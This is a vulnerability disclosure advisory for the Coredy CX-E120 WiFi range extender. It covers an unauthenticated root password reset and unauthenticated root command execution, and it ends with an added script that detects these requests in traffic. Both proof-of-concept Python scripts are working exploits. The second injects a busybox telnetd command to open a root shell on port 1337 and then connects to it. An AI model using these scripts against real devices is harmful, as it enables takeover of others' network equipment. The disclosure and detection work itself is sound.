### Vulnerabilities Summary
The following advisory describes two (2) vulnerabilities found in the Coredy CX-E120 Repeater.
The Coredy CX-E120 WiFi Range Extender is “a network device with multifunction, which can be used for increasing the distance of a WiFi network by boosting the existing WiFi signal and enhancing the overall signal quality over long distances. An extender repeats the signals from an existing WiFi router or access point.”
### The vulnerabilities found are:
* Unauthenticated Root Password Reset
* Unauthenticated Remote Command Execution
### Credit
An independent security researcher, Corben Douglas (@sxcurity), has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program.
### Vendor response
Coredy has released patches to address these vulnerabilities (WN575A3-A-RPTA3-75W.M4300.01.GD.2017Nov22-WEBC.bin).
### Vulnerabilities details
#### Unauthenticated Root Password Reset
An unauthenticated user can send a POST request to /cgi-bin/adm.cgi that resets the root password, using the parameters page=sysAdm and username=, plus the new password in newpass= and confpass=.
#### Proof of Concept
```
#!/usr/bin/env python
import sys,requests, httplib
def main():
    ip = sys.argv[1]
    port = sys.argv[2]
    user = sys.argv[3]
    password = sys.argv[4]
    target = ip+':'+port+'/cgi-bin/adm.cgi'
    headers = {
        'user-agent':'repeater-pwn',
        'Content-Type':'application/x-www-form-urlencoded',
    }
    data = 'page=sysAdm&username='+user+'&newpass='+password+'&confpass='+password
    req = requests.post(target,data,headers=headers)
try:
    main()
except IndexError:
    print("Usage: python "+sys.argv[0]+" http://<target> <port> admin newpassword")
except requests.exceptions.ChunkedEncodingError:
    print("\n\033[92m[+] Attack Sent\033[0m\n\033[91m[+] Try login with new credentials\033[0m")
except httplib.IncompleteRead:
    print("\n\033[92m[+] Attack Sent\033[0m\n\033[91m[+] Try login with new credentials\033[0m")
```
#### Remote Command Execution
An unauthenticated user can send a POST request to /cgi-bin/adm.cgi with the following parameters: page=sysCMD, SystemCommandSubmit=Apply, and command= set to the command to run. The input is executed as a command with root privileges.
#### Proof of concept
```
#!/usr/bin/env python
import sys,os,requests
from lxml import html
def main():
    ip = sys.argv[1]
    prt = sys.argv[2]
    cmd = '/bin/busybox telnetd -l/bin/sh -p1337'
    target = 'http://'+ip+':'+prt+'/cgi-bin/adm.cgi'
    payload = 'page=sysCMD&command='+cmd+'&SystemCommandSubmit=Apply'
    headers = {
        'User-Agent': 'repeater-pwn',
        'Content-Type': 'application/x-www-form-urlencoded',
        'Referer': 'http://'+ip+':'+prt+'/webcmd.shtml'
    }
    r = requests.post(target,data=payload, headers=headers)
    final = requests.get(r.url)
    #pwnd = html.fromstring(final.content)
    #result = pwnd.xpath('//textarea/text()')
    #print result
    print "\n[+] ATTACK SENT"
    print "[+] Attempted to spawn /bin/sh on port 1337...attempting to connect\n"
    os.system("nc " +ip+ ' 1337')
try:
    main()
except IndexError:
    print("Usage: python "+sys.argv[0]+" <IP> <PORT>\n")
```
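A detection sketch for both issues above, as an added example that is not part of the original advisory: it parses captured HTTP requests and flags POSTs to /cgi-bin/adm.cgi that carry the page=sysAdm or page=sysCMD parameter sets. The sample requests, IP addresses, host name and the page=status value are constructed; the advisory does not say how the device marks an authenticated session, so every match is reported for triage.

```python
import posixpath
from urllib.parse import parse_qs, unquote, urlsplit

ADM_PATH = "/cgi-bin/adm.cgi"  # endpoint named in the advisory

def classify_request(raw: bytes):
    """Return which advisory issue a raw HTTP request matches, or None."""
    head, _, body = raw.partition(b"\r\n\r\n")
    parts = head.split(b"\r\n", 1)[0].decode("latin-1").split(" ")
    if len(parts) != 3 or parts[0].upper() != "POST":
        return None
    # Normalise the path so /cgi-bin/./adm.cgi or %-encoded forms still match.
    path = posixpath.normpath(unquote(urlsplit(parts[1]).path))
    if path != ADM_PATH:
        return None
    # parse_qs percent-decodes names and values (page=sys%43MD -> sysCMD).
    form = parse_qs(body.decode("latin-1"), keep_blank_values=True)
    pages = set(form.get("page", []))  # check every value if page= repeats
    if "sysAdm" in pages and ("newpass" in form or "confpass" in form):
        return "password-reset"
    if "sysCMD" in pages and "command" in form:
        return "command-execution"
    return None

def scan(captures):
    """captures: iterable of (source_ip, raw_request). Returns the hits."""
    hits = []
    for src, raw in captures:
        finding = classify_request(raw)
        if finding:
            hits.append((src, finding))
    return hits

def _req(line, body=""):
    # Builds one constructed request for the samples below.
    return (f"{line}\r\nHost: repeater.example\r\n"
            f"Content-Length: {len(body)}\r\n\r\n{body}").encode("latin-1")

# Constructed sample traffic (documentation IPs, placeholder values).
SAMPLES = [
    ("192.0.2.10", _req("POST /cgi-bin/adm.cgi HTTP/1.1",
                        "page=sysAdm&username=admin&newpass=x&confpass=x")),
    ("192.0.2.11", _req("POST /cgi-bin/./adm.cgi HTTP/1.1",
                        "page=sys%43MD&command=uptime&SystemCommandSubmit=Apply")),
    ("192.0.2.12", _req("GET /index.html HTTP/1.1")),
    ("192.0.2.13", _req("POST /cgi-bin/adm.cgi HTTP/1.1", "page=status")),
]

if __name__ == "__main__":
    for src, finding in scan(SAMPLES):
        print(f"{src}: {finding}")
```

On a patched device these requests may still appear in traffic, so a hit indicates an attempt and should be correlated with the firmware version before being treated as a compromise.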